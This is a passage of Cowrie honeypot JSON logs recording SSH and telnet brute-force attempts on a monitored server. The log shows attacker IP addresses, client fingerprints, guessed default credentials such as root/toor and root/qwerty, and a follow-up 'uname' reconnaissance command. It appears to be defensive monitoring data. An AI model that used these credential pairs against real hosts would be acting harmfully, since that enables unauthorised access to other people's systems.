sh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:15:51.192796Z","src_ip":"212.227.235.229","session":"56f3e64033d7"}
{"eventid":"cowrie.login.failed","username":"flask","password":"123456","message":"login attempt [flask/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:15:51.946168Z","src_ip":"212.227.235.229","session":"56f3e64033d7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:15:53.198559Z","src_ip":"212.227.235.229","session":"56f3e64033d7"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":45570,"dst_ip":"1.2.3.4","dst_port":23,"session":"6701cdc14f66","protocol":"telnet","message":"New connection: 8.222.212.69:45570 (1.2.3.4:23) [session: 6701cdc14f66]","sensor":"my-vps","timestamp":"2025-08-28T07:15:58.550377Z"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":35490,"dst_ip":"1.2.3.4","dst_port":22,"session":"f76910eddde8","protocol":"ssh","message":"New connection: 193.32.162.145:35490 (1.2.3.4:22) [session: f76910eddde8]","sensor":"my-vps","timestamp":"2025-08-28T07:16:00.488913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:16:00.490066Z","src_ip":"193.32.162.145","session":"f76910eddde8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T07:16:00.520361Z","src_ip":"193.32.162.145","session":"f76910eddde8"}
{"eventid":"cowrie.login.failed","username":"solana","password":"1234","message":"login attempt [solana/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T07:16:00.613041Z","src_ip":"193.32.162.145","session":"f76910eddde8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50172,"dst_ip":"1.2.3.4","dst_port":22,"session":"76eedfde7e61","protocol":"ssh","message":"New connection: 212.227.125.160:50172 (1.2.3.4:22) [session: 76eedfde7e61]","sensor":"my-vps","timestamp":"2025-08-28T07:16:00.665181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:16:00.670894Z","src_ip":"212.227.125.160","session":"76eedfde7e61"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:16:00.892005Z","src_ip":"212.227.125.160","session":"76eedfde7e61"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:16:01.644663Z","src_ip":"193.32.162.145","session":"f76910eddde8"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy123","message":"login attempt [deploy/deploy123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:16:01.760705Z","src_ip":"212.227.125.160","session":"76eedfde7e61"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:16:02.982087Z","src_ip":"212.227.125.160","session":"76eedfde7e61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51686,"dst_ip":"1.2.3.4","dst_port":22,"session":"b716d1022353","protocol":"ssh","message":"New connection: 212.227.235.229:51686 (1.2.3.4:22) [session: b716d1022353]","sensor":"my-vps","timestamp":"2025-08-28T07:16:07.280934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:16:07.288295Z","src_ip":"212.227.235.229","session":"b716d1022353"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:16:07.527692Z","src_ip":"212.227.235.229","session":"b716d1022353"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy123","message":"login attempt [deploy/deploy123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:16:08.511218Z","src_ip":"212.227.235.229","session":"b716d1022353"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:16:09.760055Z","src_ip":"212.227.235.229","session":"b716d1022353"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61786,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcbe88278bd1","protocol":"ssh","message":"New connection: 217.72.205.35:61786 (1.2.3.4:22) [session: dcbe88278bd1]","sensor":"my-vps","timestamp":"2025-08-28T07:16:10.094718Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:16:10.096218Z","src_ip":"217.72.205.35","session":"dcbe88278bd1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53538,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c0dcccb28e3","protocol":"ssh","message":"New connection: 212.227.125.160:53538 (1.2.3.4:22) [session: 4c0dcccb28e3]","sensor":"my-vps","timestamp":"2025-08-28T07:16:17.171764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:16:17.172617Z","src_ip":"212.227.125.160","session":"4c0dcccb28e3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:16:17.392475Z","src_ip":"212.227.125.160","session":"4c0dcccb28e3"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:16:18.052643Z","src_ip":"212.227.125.160","session":"4c0dcccb28e3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:16:18.510217Z","src_ip":"212.227.125.160","session":"4c0dcccb28e3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:16:18.510729Z","src_ip":"212.227.125.160","session":"4c0dcccb28e3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:16:18.731843Z","src_ip":"212.227.125.160","session":"4c0dcccb28e3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:16:18.732843Z","src_ip":"212.227.125.160","session":"4c0dcccb28e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49466,"dst_ip":"1.2.3.4","dst_port":22,"session":"032041e44367","protocol":"ssh","message":"New connection: 212.227.235.229:49466 (1.2.3.4:22) [session: 032041e44367]","sensor":"my-vps","timestamp":"2025-08-28T07:16:23.703479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:16:23.704098Z","src_ip":"212.227.235.229","session":"032041e44367"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:16:23.966777Z","src_ip":"212.227.235.229","session":"032041e44367"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:16:24.756167Z","src_ip":"212.227.235.229","session":"032041e44367"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:16:25.375287Z","src_ip":"212.227.235.229","session":"032041e44367"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:16:25.376054Z","src_ip":"212.227.235.229","session":"032041e44367"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:16:25.640027Z","src_ip":"212.227.235.229","session":"032041e44367"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:16:25.641217Z","src_ip":"212.227.235.229","session":"032041e44367"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50112,"dst_ip":"1.2.3.4","dst_port":22,"session":"237f8e441bba","protocol":"ssh","message":"New connection: 212.227.125.160:50112 (1.2.3.4:22) [session: 237f8e441bba]","sensor":"my-vps","timestamp":"2025-08-28T07:16:33.514063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:16:33.515035Z","src_ip":"212.227.125.160","session":"237f8e441bba"}
{"eventid":"cowrie.session.closed","duration":35.05853867530823,"message":"Connection lost after 35 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:16:33.608847Z","src_ip":"8.222.212.69","session":"6701cdc14f66"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:16:33.750964Z","src_ip":"212.227.125.160","session":"237f8e441bba"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:16:34.447830Z","src_ip":"212.227.125.160","session":"237f8e441bba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:16:34.932989Z","src_ip":"212.227.125.160","session":"237f8e441bba"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:16:34.933704Z","src_ip":"212.227.125.160","session":"237f8e441bba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:16:35.164364Z","src_ip":"212.227.125.160","session":"237f8e441bba"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:16:35.165804Z","src_ip":"212.227.125.160","session":"237f8e441bba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38202,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a72c93bd314","protocol":"ssh","message":"New connection: 212.227.235.229:38202 (1.2.3.4:22) [session: 0a72c93bd314]","sensor":"my-vps","timestamp":"2025-08-28T07:16:40.215190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:16:40.216045Z","src_ip":"212.227.235.229","session":"0a72c93bd314"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:16:40.470556Z","src_ip":"212.227.235.229","session":"0a72c93bd314"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:16:41.235760Z","src_ip":"212.227.235.229","session":"0a72c93bd314"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:16:41.835944Z","src_ip":"212.227.235.229","session":"0a72c93bd314"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:16:41.836707Z","src_ip":"212.227.235.229","session":"0a72c93bd314"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:16:42.092668Z","src_ip":"212.227.235.229","session":"0a72c93bd314"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:16:42.093906Z","src_ip":"212.227.235.229","session":"0a72c93bd314"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39752,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b666e07900b","protocol":"ssh","message":"New connection: 212.227.125.160:39752 (1.2.3.4:22) [session: 3b666e07900b]","sensor":"my-vps","timestamp":"2025-08-28T07:16:49.983213Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:16:49.984156Z","src_ip":"212.227.125.160","session":"3b666e07900b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:16:50.211851Z","src_ip":"212.227.125.160","session":"3b666e07900b"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123qwe","message":"login attempt [oracle/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-28T07:16:50.896743Z","src_ip":"212.227.125.160","session":"3b666e07900b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:16:52.126589Z","src_ip":"212.227.125.160","session":"3b666e07900b"}
